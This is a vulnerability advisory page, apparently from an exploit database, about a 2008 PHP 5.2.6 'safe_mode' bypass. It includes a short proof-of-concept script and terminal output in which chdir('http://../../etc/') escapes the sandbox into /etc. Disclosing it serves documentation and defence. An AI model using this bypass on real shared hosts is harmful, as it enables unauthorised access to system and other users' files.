header-logo
Suggest Exploit
vendor:
PHP
by:
SecurityFocus
7.5
CVSS
HIGH
Restriction Bypass
264
CWE
Product Name: PHP
Affected Version From: PHP 5.2.6
Affected Version To: Other versions may also be affected.
Patch Exists: YES
Related CWE: N/A
CPE: a:php:php
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHP ‘safe_mode’ Restriction Bypass Vulnerabilities

PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized locations; other attacks are also possible. Exploiting these issues allows attackers to obtain sensitive data that could be used in other attacks. These vulnerabilities would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' restriction is expected to isolate users from each other.

Mitigation:

Ensure that the 'safe_mode' restriction is properly configured and enforced.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/29796/info

PHP is prone to multiple 'safe_mode' restriction-bypass vulnerabilities. Successful exploits could allow an attacker to determine the presence of files in unauthorized locations; other attacks are also possible.

Exploiting these issues allows attackers to obtain sensitive data that could be used in other attacks.

These vulnerabilities would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' restriction is expected to isolate users from each other.

PHP 5.2.6 is vulnerable; other versions may also be affected. 

cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid
is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on
line 3
/www
cxib#
---/EXAMPLE1---

---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#

Navigation

Suggest Exploit

Services By CQR